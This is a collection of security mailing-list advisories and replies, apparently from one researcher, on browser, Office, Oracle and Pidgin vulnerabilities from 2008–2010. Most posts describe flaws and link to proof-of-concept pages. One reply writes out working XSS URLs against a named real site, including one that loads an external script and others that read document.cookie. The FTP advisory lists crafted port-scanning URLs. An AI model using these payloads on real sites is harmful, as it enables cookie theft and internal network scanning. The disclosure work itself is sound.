CVE-2010-2404 | Persistent Cross Site Scripting Vulnerability in Oracle I-Recruitment - E-Business Suite
Advisory: Persistent Cross Site Scripting Vulnerability in Oracle I-Recruitment File Uploading Module- E-Business Suite CVE-2010-2404 Version Affected - 11.5.10.2, 12.0.6, 12.1.3 About: Oracle I-Recruitment Suite Oracle iRecruitment is a web based full-cycle recruiting solution that gives managers, recruiters and candidates the ability to manage every phase of finding, recruiting, hiring, and tracking new employees. It is a part of Oracle E-business suite. Discussion: A persistent cross site scripting vulnerability exists in the I-Recruitment portal. The account information page allows the user to upload his resume in Microsoft Word document. An attacker can construct a malicious MSWord file to conduct XSS attack by setting XSS payload in hyperlinks in order to bypass conversion filters. For attack details , Refer to the following paper: http://secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf Disclosure: The vulnerability was disclosed to Oracle in January 2009 and is patched in October 2010 CPU release. Credit: Aditya K Sood of SecNiche Security Contact: adi_ks [at] secniche.org Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything.
CVE-2010-3200 : Microsoft Word 2003 MSO Null Pointer Dereference Vulnerability
Advisory Microsoft Word 2003 MSO Null Pointer Dereference Vulnerability CVE: 2010-3200 Version Word 2003 (SP3) 11.8326.11.8324 tested on windows XP SP2/SP3 Details : A null pointer dereference vulnerability has been noticed in MS Word.The exception results in the MSO.dll library which fails to handle the special crafted buffer in a file.The issue can be potentially triggered by openinga malicious word file which resulted in a null pointer exception due to invalid memory read. Note: It has intermediate impact because if system is running (n) number of instance of MS Word , opening of this malicious doc file results in crash of all the instances thereby completely subverting the functionality of word. The following state of registers and frames were noticed eax= ebx= ecx=02711d68 edx= esi= edi=008c1b1c eip=30f91fd7 esp=0013cca0 ebp=0013ccb4 iopl=0 nv up ei ng nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00210282 mso!Ordinal1033+0x3f4: 30f91fd7 8b481c mov ecx,dword ptr [eax+1Ch] ds:0023:001c= 0:000 k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0013ccb4 30f16d61 mso!Ordinal1033+0x3f4 0013ccdc 30ef266f mso!Ordinal2272+0xad 0013cdc8 30f16951 mso!Ordinal233+0x596 mso!Ordinal1307+0xc0e 0:000 u mso!Ordinal1033+0x3f4: 30f91fd7 8b481c mov ecx,dword ptr [eax+1Ch] 30f91fda f6c101 testcl,1 30f91fdd 0f85f3b20900jne mso!Ordinal2868+0x2eb87 (3102d2d6) 30f91fe3 8b701c mov esi,dword ptr [eax+1Ch] 30f91fe6 83e601 and esi,1 30f91fe9 753ajne mso!Ordinal1033+0x442 (30f92025) 30f91feb 8b4848 mov ecx,dword ptr [eax+48h] 30f91fee 2bd1sub edx,ecx Basic Block: 30f91fd7 mov ecx,dword ptr [eax+1ch] Tainted Input Operands: eax 30f91fda test cl,1 Tainted Input Operands: cl 30f91fdd jne mso!ordinal2868+0x2eb87 (3102d2d6) Tainted Input Operands: ZeroFlag Proof of Concept The required proof of concept is available on below mentioned link http://www.secniche.org/word_crash_11.8326.8324_poc.zip Vendor Response: The vulnerability was reported to Microsoft. Due to the nature of inherent crash no separate bulletin will be released. In the next release of development this issue will be patched or corrected. Regards Aditya K Sood
Re: Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)
Hi Tim First of all, the dialog spoofing issue still works in Google Chrome and it has not been patched. A lot of tests have been conducted considering different variants spoofing. I missed your paper previously. I must say its a very good read. A similar issue about Google URL obfuscation, which still persists because it has been mentioned by the team itself some stuff is based on the standards of HTTP protocol handler authentication schemes (http://www.nice@evil.com). The link is as follows http://code.google.com/p/chromium/issues/detail?id=4739 Further, it has been mentioned several times that it is a legitimate attack point used by phishers. For example: http://code.google.com/p/browsersec/wiki/Part3#HTTP_authentication Even this issue is not patched. May be URL protection like Mozilla is a good practice. Further, Mozilla has worked pretty fine after the dialog spoofing vulnerability disclosed by Aviv Raff on below mentioned link :http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx We have used a well defined PHP script in this demo combining with a URL obfuscation issue. Since spoofing aims at manipulating the security features in user interfaces, it requires a new model dialog for HTTP authentication that should disseminate the realm value from domain name. Restricting, the string length of Realm value could be a good lead here. Kind Regards Aditya Tim wrote: Hi Aditya, Google Chrome ( 5.0.375.127 and previous versions) suffers from HTTP Auth Dialog spoofing vulnerability due to possible realm manipulation in the HTTP header. Previously, Google chrome has got a similar bug which can be seen on the following link How is this significantly different than the issues described in: http://www.vsecurity.com/download/papers/WeaningTheWebOffOfSessionCookies.pdf ? See the section on page 11 entitled Weak User Interfaces for HTTP Authentication In your video, I didn't see precisely what realm string was sent or what the overall auth header was, so it's hard to tell. Also, it may be that variants of these attacks still work in Firefox. Note that the above paper was sent to all major browser vendors around the time that Google was notified about (and fixed) this bug: http://code.google.com/p/chromium/issues/detail?id=32718 tim
Re: Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)
Hi Tim You can have a look at the screenshot at below mentioned link http://www.secniche.org/goog_chr_auth_spoof.jpg Kind Regards Aditya Tim wrote: Aditya, First of all, the dialog spoofing issue still works in Google Chrome and it has not been patched. I'm not surprised. There didn't seem to be a lot of interest in these issues from any browser vendor when I brought them to their attention. A lot of tests have been conducted considering different variants spoofing. I missed your paper previously. I must say its a very good read. Not a problem; the paper only addressed this topic tangentially. I only brought it up because I wasn't sure how things had changed since I last tested and thought you could enlighten me. Further, it has been mentioned several times that it is a legitimate attack point used by phishers. For example: http://code.google.com/p/browsersec/wiki/Part3#HTTP_authentication Yup, the attack scenario I described came straight from the BSH, though I didn't mess around with the password-in-URL stuff. Even this issue is not patched. May be URL protection like Mozilla is a good practice. Further, Mozilla has worked pretty fine after the dialog spoofing vulnerability disclosed by Aviv Raff on below mentioned link :http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx Ah, nice, I didn't see this one when I was last testing this stuff. We have used a well defined PHP script in this demo combining with a URL obfuscation issue. Since spoofing aims at manipulating the security features in user interfaces, it requires a new model dialog for HTTP authentication that should disseminate the realm value from domain name. Restricting, the string length of Realm value could be a good lead here. More usefully, the realm should be clearly separated from the domain and labeled in the dialog like Opera does it. See the screenshot of that in my paper. There could still be some confusion, but it's clearly much better than trying to embed potentially malicious strings within the same sentences as more carefully validated ones (the domain). So, once again, could you send the realm string/auth header you were setting in that demo? thanks, tim
Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)
Hi Google Chrome ( 5.0.375.127 and previous versions) suffers from HTTP Auth Dialog spoofing vulnerability due to possible realm manipulation in the HTTP header. Previously, Google chrome has got a similar bug which can be seen on the following link http://code.google.com/p/chromium/issues/detail?id=36772 This bug was actually patched. The issue mentioned in this bug was dialog spoofing due to long sub domain names. The patch worked only for that specific case which was outlined in that bug. There are number of tests have been conducted on Google Chrome which verifies the inefficiency of Google Chrome to scrutinize the type of realm value set in the header. It can be tampered with double quotes and single quotes used in a definite manner. As mentioned in RFC 2617 /The realm directive (case-insensitive) is required for all authentication schemes that issue a challenge. The realm value (case-sensitive), in combination with the canonical root URL (the absolute URI for the server whose abs_path is empty; http://greenbytes.de/tech/webdav/rfc2617.html#RFC2616of the server being accessed, defines the protection space. These realms allow the protected resources on a server to be partitioned into a set of protection spaces, each with its own authentication scheme and/or authorization database.//The realm value is a string, generally assigned by the origin server, which may have additional semantics specific to the authentication scheme. Note that there may be multiple challenges with the same auth-scheme but different realm/s./ /So, realm value plays critical role in determining the framework of HTTP Access authentication for a particular resource. It has been analyzed that it is possible to spoof the HTTP Auth dialog by playing around realm values. This attack scenario can be used to launch phishing attacks and stealing sensitive information from the legitimate websites. As it has been released before, Google Chrome fails to sanitize the obfuscated URL and redirect it to the different domain. This potential flaw can be combined with the HTTP Auth dialog spoofing to launch attacks against legitimate websites. An appropriate POC video has been released on the below mentioned links http://www.youtube.com/watch?v=r1KuE2th_EY http://secniche.org/videos/goog_http_auth_realm_mani.html (Note: A comparative test against Firefox has been placed in the video itself) Kind Regards Aditya K Sood http://www.secniche.org
Re: [WEB SECURITY] Re: Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw
Hi Berend-Jan Please find the respective responses Repro steps: 1) Some website do not sanitize user input correctly, such as the one in your example, which allows things like XSS: http://www.worksafenb.ca/redirect.asp?V=;'%20src=http://skypher.com/SkyLined/xss.js/SCRIPTSCRIPT%20x=' http://www.worksafenb.ca/redirect.asp?V=*//SCRIPTSCRIPTalert(document.cookie);/* http://www.worksafenb.ca/redirect.asp?V=*/%3C/SCRIPT%3E%22%3CSCRIPT%3Ealert%28document.cookie%29;/* 2) This may also allow the '@' character to be inserted into a link on the site, which has special meaning in URLs, as described in http://www.ietf.org/rfc/rfc1738.txt: 3.1. Common Internet Scheme Syntax While the syntax for the rest of the URL may vary depending on the particular scheme selected, URL schemes that involve the direct use of an IP-based protocol to a specified host on the Internet use a common syntax for the scheme-specific data: //user:password@host:port/url-path 3) Because Chromium follows the RFC and parses the URL correctly, a user that clicks on the link will be taken to the site specified by the URL. As you can see, I unfortunately fail to understand why this is a design flaw in Chromium. It seems to me that you are suggesting that Chromium add a feature to mitigate this server-side problem by ignoring the RFC and prevent all links with an @ sign in them from working altogether like MSIE does or warn the user about such URLs like Firefox does? I am obviously missing something here, maybe you can elaborate even further? The point is not of implementation. URL/URI specification provided in the RFC is treated as standard benchmark but the point here is about the security check which is not implemented in Chrome. Every time this issue comes up, the point of status bar link interpretation is discussed which is simply one point of just showing the way links active in web page. The web page input problem is always a case but the browser problems make it more adverse. I don't want to take too much of your precious time as a researcher, so I reported this feature request for you: http://code.google.com/p/chromium/issues/detail?id=31625 You mentioned that you have reported this before but I couldn't find any bugs relating to this: http://code.google.com/p/chromium/issues/list?can=1q=reporter:Adi.ZeroK http://code.google.com/p/chromium/issues/list?can=1q=reporter:Adi.ZeroKsort=-idcolspec=ID+Summary+Status+Modified+Type+Restrict+Pri+Mstone+Ownerx=mstoney=areacells=tiles Maybe you could find them and mark as duplicates of this bug yourself (or the other way around)? I am not sure about the fact that you have not found that. It was reported on 28 November 2008 and the status was changed to Wont Fix by the team itself. You can have a look at: http://code.google.com/p/chromium/issues/detail?id=4739 I think this can clear the point. Its the same point which I am mentioning from long time. We just want that issues should be patched so that users can have better experience. Kind Regards Aditya Thanks! SkyLined Berend-Jan Wever berendjanwe...@gmail.com mailto:berendjanwe...@gmail.com http://skypher.com/SkyLined On Tue, Jan 5, 2010 at 3:02 PM, Aditya K Sood 0kn...@secniche.org mailto:0kn...@secniche.org wrote: Hi Recently with an outcome of Owasp RC1 top 10 exploited vulnerability list , redirection issues have already made a mark in that. Even the WASC has included the URL abusing as one of the stringent attacks. Well to be ethical in this regard these are not the recent attacks but are persisting from long time. The only difference is the exploitation ratio has increased from bottom to top. So that's the prime reason it has been included in the web application security benchmarks. But the projection of redirection attacks is active now. This post is not about explaining the basics of redirection issues. It is more about the design vulnerabilities in browsers that can lead to potential persistent redirection vulnerabilities. Web application security can be hampered due to browser problems. Note: The base is to project the implications of browser inefficiency and the ease in conducting web application attacks. Post: http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html Video: http://www.secniche.org/videos/google_chrome_link_inj.html Browsers need to take care of these issues. Regards Aditya K Sood http://www.secniche.org
Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw
Hi Recently with an outcome of Owasp RC1 top 10 exploited vulnerability list , redirection issues have already made a mark in that. Even the WASC has included the URL abusing as one of the stringent attacks. Well to be ethical in this regard these are not the recent attacks but are persisting from long time. The only difference is the exploitation ratio has increased from bottom to top. So that's the prime reason it has been included in the web application security benchmarks. But the projection of redirection attacks is active now. This post is not about explaining the basics of redirection issues. It is more about the design vulnerabilities in browsers that can lead to potential persistent redirection vulnerabilities. Web application security can be hampered due to browser problems. Note: The base is to project the implications of browser inefficiency and the ease in conducting web application attacks. Post: http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html Video: http://www.secniche.org/videos/google_chrome_link_inj.html Browsers need to take care of these issues. Regards Aditya K Sood http://www.secniche.org
Advisory - Gmail/Google Doc PDF Repurposing Integrated Attacks - Cookie Hijacking / Stealing
Hi Google docs network was vulnerable to PDF repurposing attacks. The vulnerability was disclosed to Google with a discretion. This was done to mitigate the risk . Google had worked over it and patched it with in a period of 5 days. The Google doc has been refined now and the integrated support for adobe plugin is removed. The user security was the prime issue because millions of user were at risk if this attack persisted in the open environment. Integrated accounts were more susceptible as certain stolen credentials could be used to access accounts. The advisory is released here: http://secniche.org/gmd_hijack/gc_hijack.xhtml http://secniche.org/gmd_hijack/advisory_gmail_google_docs_pdf_repurposing_attack.pdf Regards Aditya KS http://www.secniche.org
[SecNiche WhitePaper ] - PDF Silent HTTP Form Repurposing Attacks
Hi This paper sheds light on the modified approach to trigger web attacks through JavaScript protocol handler in the context of browser when a PDF is opened in it. As we have seen, the kind of security mechanism implemented by Adobe in order to remove the insecurities that originate directly from the standalone PDF document in order to circumvent cross domain access. The attack is targeted on the web applications that allow PDF documents to be uploaded on the web server. http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf Regards Aditya KS http://www.secniche.org
In Response to Bid 34130 Invalid
The observed behavior is explained on below mentioned link http://zeroknock.blogspot.com/2009/04/google-chrome-alert-single-thread-out.html This vulnerability persists in newer version of Google Chrome too.
Microsoft Internet Explorer 8 - Anti Spoofing is a Myth
Hi With the new features implemented in IE 8, the status address bar has been transformed too. The new step taken by Microsoft IE team that is not to show the address of selected link in a status bar can have a serious impact. A user will not be able to see the active link in the status bar. This looks like to be an implementation of security solution with an obscurity. Status bar is required for Link Integrity check that assures a user about the legitimate website. We are not considering the ingrained vulnerabilities of status address bar spoofing in browsers at this point of time. Browsers like MOZILLA, Chrome etc are having well designed and effective status address bars. For detail issue : http://www.secniche.org/ie_spoof_myth/ Regards Aditya K Sood http://www.secniche.org
[SecNiche Whitepaper] Evading Web XSS Filters with Microsoft Word - WAPT Perspective
Hi This paper exposes a new attack vector of testing web applications having upload functionality. It enhances the web application penetration testing perspective by demonstrating a new way to produce XSS in the web applications when a word document is rendered directly in the browser. This attack has been tested on number of enterprise web applications and is successfully triggered. The vendor have been given advisories in relation to this attack vector. It works fine with custom designed web applications in distributed environment. Some time enhanced functionality in software leads to generation of new attack vectors. You can download the paper at: http://www.secniche.org/paper.html http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf Regards Aditya K Sood Founder , SecNiche Security http://www.secniche.org
Advisory: Google Chrome 1.0.154.43 ClickJacking Vulnerability.
Version Affected: Chrome/1.0.154.43 and previous too Description: The Google chrome browser is vulnerable to clickjacking flaw.A clickjacked page tricks a user into performing undesired actions by clicking on a concealed link. attackers can trick users into performing actions which the users never intended to do and there is no way of tracing such actions later, as the user was genuinely authenticated on the other page. Proof of Concept: http://www.secniche.org/gcr_clkj Detection: SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are: Chrome/1.0.154.43 Disclosure Timeline: Disclosed: 27 January 2009 Release Date. 28 January 2009 Vendor Response: Google acknowledges this vulnerability and already working on it. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory: Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability
Version Affected: Oracle E-Business Suite Release 12, version 12.0.6 Oracle E-Business Suite Release 11i, version 11.5.10.2 CVE: 2008-5446 Description: The oracle E Business including applications like I-Recruitment etc is vulnerable to flaw which leads to sensitive information disclosure about the deployment of oracle application and server in a production environment. The flaw persists in the E Business suite designed code which allows malicious user to steal sensitive information through About Us Page (shipped with E Business Suite) by allowing guest access. In addition to this a straight forward access is granted to attacker to steal all the information which provide potential attack surface for conducting stringent attacks. The severity gets higher because the type of information is revealed. This can be structured over two end points as: 1. If an application is hosted on internet with external interface. 2. If an application is hosted in organization production environment. Proof of Concept: Refer to the whitepaper for detail information http://secniche.org/papers/orabs.pdf Detection: SecNiche confirmed this vulnerability affects the above oracle version listed. Disclosure Timeline: Disclosed: 25 Sept 2008 Reply : 26 Sept 2008 Oracle Fix and Release Date. 13 January 2009 Links: http://www.secniche.org/orabs.html http://evilfingers.com/advisory/index.php Vendor Response: Oracle acknowledges this vulnerability and fix have been release in critical advisory update of 13 January 2009 Oracle Critical Patch Update: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Credit: Oracle Credited Aditya K Sood for discovering this vulnerability Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.
Advisory: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability. Version Affected: Google Chrome: 1.0.154.36 Description: Google Chrome FTP Client is vulnerable to FTP PASV malicious port scanning vulnerability. The username in the FTP (ftp://username:passw...@domain.com) can be manipulated by tampering it with certain IP address with specification of port as (ftp://xxx.xxx.xxx.xxx-22:passw...@domain.com).The Google Chrome FTP client make connection to the rogue FTP server which uses PASV commands to scan network.Dynamic requests are issued to a rogue FTP server which accepts connection with different usernames as the IP address with specified ports to locate the non existing object on the target domain. Request 1 : ftp://xxx.xxx.xxx.xxx-21:passw...@domain.com Request 2 : ftp://xxx.xxx.xxx.xxx-22:passw...@domain.com Request 3 : ftp://xxx.xxx.xxx.xxx-23:passw...@domain.com Request 4 : ftp://xxx.xxx.xxx.xxx-25:passw...@domain.com JavaScript Port Scanning is used to exploit this issue. A malicious web page hosted on a specially-coded FTP server could use this feature to perform a generic port-scan of machines inside the firewall of the victim.The generated fraudulent request helps attacker to exhibit internal network information through sustainable port scanning through JavaScript. Proof of Concept: http://www.secniche.org/gcfpv Links: http://secniche.org/gcfps.html http://evilfingers.com/advisory/index.php Detection: SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform. The versions tested are: Chrome: 1.0.154.36 Disclosure Timeline: Disclosed: 1 January 2009 Release Date. 4 January 2009 Vendor Response: Google acknowledges this vulnerability by reproducing the issue. Views have been exchanged over the severity level of this flaw.The chrome ID of this issue is 5978. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Google Chrome MetaCharacter URI Obfuscation Vulnerability
Advisory: Google Chrome MetaCharacter URI Obfuscation Vulnerability. Version Affected: All Chrome/0.2.149.30 Chrome/0.2.149.29 Chrome/0.2.149.27 Description: Google chrome is vulnerable to URI Obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link can not be traversed properly in status address bar.This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. The URI specified with @ character with or without NULL character causes the vulnerability. Proof of Concept: http://www.secniche.org/gcuri/index.html http://www.secniche.org/gcuri http://evilfingers.com/advisory/index.php Detection: SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are: Chrome/0.2.149.30 Chrome/0.2.149.29 Disclosure Timeline: Disclosed: 24 November 2008 Release Date. 24 November ,2008 Vendor Response: Reported to Google. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Google Chrome OnbeforeUload and OnUnload Null Check Vulnerability.
Advisory: Google Chrome OnbeforeUload and OnUnload Null Check Vulnerability. Version Affected: Chrome/0.2.149.30 Chrome/0.2.149.29 Chrome/0.2.149.27 Description: Google chrome is susceptible to stringent behavior while handling onbeforeunload and onunload event in body tags. The malicious script render the browser useless when a event is created in a any kind of loop. As a result of which browser can not be closed and remain in useless form.It is possible to trigger it automatically with a redirect clause which can be used by malicious attacker to trick users. In certain conditions it can be used for browser based denial of service. Proof of Concept: http://www.secniche.org/gwobl/poc.html http://www.secniche.org/gwobl/index.html Links: http://www.secniche.org/advisory.html http://evilfingers.com/advisory/index.php Detection: SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are: Chrome/0.2.149.30 Chrome/0.2.149.29 Disclosure Timeline: Disclosed: 19 October 2008 Release Date. 21 October ,2008 Vendor Response: Google acknowledges this vulnerability and fix will be released soon. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory: Mozilla Firefox User Interface Null Pointer Dereference Dispatcher Crash and Remote Denial of Service.
Mozilla Firefox User Interface Null Pointer Dereference Dispatcher Crash and Remote Denial of Service. *Version Tested:* Mozilla 3.0.3 - 1.9.0 Branch /(Specifically for Latest Version)/ *Severity:* High *Description:* The mozilla firefox is vulnerable to user interface event dispatcher null pointer dereference denial of service attacks. The dispatched event created dynamically leads to firefox crash when it is called directly or in a defined l oop with number of generated user interface events.The resultant crash results in: Exception Type: EXC_BAD_ACCESS (SIGBUS) Exception Codes: KERN_PROTECTION_FAILURE at 0x0007 Crashed Thread: 0 Thread 0 Crashed: 0 libxpcom_core.dylib nsTArray_base::Length() const + 11 (nsTArray.h:66) 1 libgklayout.dylib nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray) + 261 (nsContentUtils.cpp:4083) This security issue is a result of unhandled exception which is a result of null pointer dereference. *Links:* http://www.secniche.org/advisory.html http://evilfingers.com/advisory/index.php *Proof of Concept http://www.secniche.org/moz303/index.html * *Detection:* SecNiche confirmed this vulnerability affects Mozilla Firefox on Microsoft Windows XP SP2 platform.The versions tested are: Mozilla 3.0.3 - 1.9.0 Branch *Disclosure Timeline:* Disclosed: 28 September 2008 Release Date. 28 September ,2008 *Vendor Response:* Mozilla confirm this vulnerability. * Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory : Opera Window Object Suppressing Remote Denial of Service
Opera Window Object Suppressing Remote Denial of Service. *Version Affected:* Opera 9.52 *Severity:* High *Description:* The opera browser is vulnerable to window object based denial of service attack. The opera fails to sanitize a check when window.close() function is called in number of dynamically generated events.. The function is called in a suppressed manner and kills the parent window directly by default which makes it vulnerable to denial of service attack. This security issue is a result of design flaw in the browser.Scripts must not close windows that were not opened by script,if script specific code is designed. There must be a parent window confirmation check prior to close of window. *Proof of Concept* *http://www.secniche.org/opera952/index.html* Links: http://www.secniche.org/advisory.html http://evilfingers.com/advisory/index.php *Detection:* SecNiche confirmed this vulnerability affects Opera on Microsoft Windows XP SP2 platform.The versions tested are: Opera 9.52 *Disclosure Timeline:* Disclosed: 28 September 2008 Release Date. 28 September ,2008 *Vendor Response:* Vulnerability reported to Opera. Bug ID 365663 *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory: Google Chrome Window Object Suppressing Remote Denial of Service.
Google Chrome Window Object Suppressing Remote Denial of Service. *Version Affected:* Chrome/0.2.149.30 Chrome/0.2.149.29 Chrome/0.2.149.27 *Severity:* High *Description:* The Google chrome browser is vulnerable to window object based denial of service attack. The Google Chrome fails to sanitize a check when window.close() function is called in body upload. The function is called in a suppressed manner and kills the parent window directly by default which makes it vulnerable to denial of service attack. This inability of Google Chrome diversifies the attack pattern as number of events can execute this function without a security check,prompting a user to allow the event to trigger. This security issue is a result of design flaw in the browser as function show stringent behavior in many cases. .Scripts must not close windows that were not opened by script,if script specific code is designed. There must be a parent window confirmation check prior to close of window. *POC: http://www.secniche.org/gws/poc.html * /NOTE: If this page is opened in Google Chrome , You need to open this POC in new window to see the killing of parent window. You can even use a Sub Tab in this. / *Links:* http://www.seniche.org/advisory.html http://www.evilfingers.com/advisory/ *Detection:* SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are: Chrome/0.2.149.30 Chrome/0.2.149.29 Chrome/0.2.149.27 *Disclosure Timeline:* Disclosed: 25 September 2008 Release Date. September 27 ,2008 *Vendor Response:* Google acknowledges this vulnerability as security bug and fix will be released soon. *Credit:* Aditya K Sood *10. Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory : Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.
*Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.* *Version Affected:* Chrome/0.2.149.30 Chrome/0.2.149.29 *Severity:* High *Description:* The Google chrome browser is vulnerable to memory exhaustion based denial of service which can be triggered remotely.The vulnerability triggers when Carriage Return(\r\n\r\n) is passed as an argument to window.open() function. It makes the Google Chrome to generate number of windows at the same time thereby leading to memory exhaustion. The behavior can be easily checked by looking at the task manager as with no time the memory usage rises high. The problem lies in the handling of object and its value returned by the javascript function. Once it is triggered the pop ups are started generating. The Google Chrome browser generate object windows continuously there by affecting memory of the resultant system. Probably it can be crashed within no time. User interaction is required in this. *Proof of Concept* http://www.secniche.org/gds *Links:* http://secniche.org/gcrds.html http://evilfingers.com/advisory/Google_Chrome_Carriage_Return_Null_Object_Memory_Exhaustion_Remote_Dos.php *Detection:* SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are: Chrome/0.2.149.30 Chrome/0.2.149.291 *Disclosure Timeline:* Disclosed: 22 September 2008 Release Date. September 24 ,2008 *Vendor Response:* Google acknowledges this vulnerability and fix will be released soon. *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Hi Two Points to consider
Hi Bugtraq Two point I want to make. 1. The version number in pidgin advisory should be 2.5.1 2. In skype explanation instead of pidgin process skype process should be there. I have corrected this on the reference sites. Just want to let you know. If any issues please let me know. Regards
Re: Pidgin IM Client Password Disclosure Vulnerability.
Quark IT - Hilton Travis wrote: The latest version of Pidgin - 2.5.1 - was released on 2008-08-31. This must be an ancient version you've got here! -- http://blog.hiltontravis.com/ Regards, Hilton Travis Phone: +61 (0)7 3105 9101 (Brisbane, Australia) Phone: +61 (0)419 792 394 Manager, Quark IT http://www.quarkit.com.au Quark Grouphttp://www.quarkgroup.com.au Microsoft SBSC PAL (Australia) http://www.sbscpal.com/ War doesn't determine who is right. War determines who is left. This document and any attachments are for the intended recipient only. It may contain confidential, privileged or copyright material which must not be disclosed or distributed. Quark Group Pty. Ltd. T/A Quark Automation, Quark AudioVisual, Quark IT -Original Message- From: Aditya K Sood [mailto:[EMAIL PROTECTED] Sent: Wednesday, 17 September 2008 10:41 PM To: bugtraq@securityfocus.com Subject: Pidgin IM Client Password Disclosure Vulnerability. Pidgin IM Client Password Disclosure Vulnerability. *Version Affected:* 0.7.10 Unicode / Previous version can be affected. *Release Date:* 11 September 2008 *About:* Pidgin is a graphical modular messaging client based on libpurple which is capable of connecting to AIM, MSN, Yahoo!, XMPP, ICQ, IRC, SILC, SIP/SIMPLE, Novell GroupWise, Lotus Sametime, Bonjour, Zephyr, MySpaceIM, Gadu-Gadu, and QQ all at once. It is written using GTK+. *Description:* The pidgin client inherits client side password disclosure vulnerability. The credentials used to connect to the required service i.e. username and password is not encrypted properly. The credentials can be extracted in clear text by dumping process memory of the live pidgin process when a connection is set. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user to execute malicious code which would dump the memory of the process pidgin.exe.. *Proof of Concept:* http://evilfingers.com/advisory/pidgin_password_disc_vuln.pdf http://secniche/advisory/pidgin_vul.pdf * cid:part1.02090307.09020405@secniche.org* *Links: * http://secniche.org/advisory.html http://evilfingers.com/advisory/index.php * Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages. Hi I have tested the 2.5.1 version. The template was wrongly constructed in version number. Any ways I have changed the things. Thanks for mentioning the construct. I appreciate that. Regards
Skype IM Client Password Disclosure Vulnerability.
